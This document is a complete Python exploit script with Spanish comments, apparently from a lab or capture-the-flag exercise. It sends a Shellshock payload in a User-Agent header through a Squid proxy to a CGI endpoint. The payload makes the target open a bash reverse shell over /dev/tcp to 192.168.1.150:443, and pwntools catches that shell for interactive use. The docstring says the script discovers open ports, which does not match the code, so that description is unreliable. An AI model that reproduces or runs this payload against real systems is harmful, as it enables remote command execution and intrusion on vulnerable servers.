# /var/bin/env python3 """ Script para descubrir puertos abiertos en un servidor web a través de un proxy Squid. """ import requests import signal import sys import threading from pwn import * from termcolor import colored def signal_handler(sig, frame): print(colored('\n\n[!] Saliendo con Ctrl+C!\n', 'red')) sys.exit(0) # Ctrl+C handler signal.signal(signal.SIGINT, signal_handler) MAIN_URL = "http://127.0.0.1/cgi-bin/status" squid_proxy = {'http': 'http://192.168.1.150:3128'} lport = 443 def shellshock_attack(): headers = { "User-Agent": "() { :; }; /bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.1.150/443 0>&1'" } r = requests.get( MAIN_URL, headers=headers, proxies=squid_proxy, timeout=1 ) if __name__ == "__main__": try: threading.Thread(target=shellshock_attack(), args=()).start() except Exception as e: log.error(str(e)) shell = listen(lport, timeout=20).wait_for_connection() if shell.sock is None: log.failure(colored( "\n[!] No se ha podido establecer la conexión\n", "red" )) sys.exit(1) else: log.success(colored("\n[+] Conexión establecida\n", "green")) shell.interactive()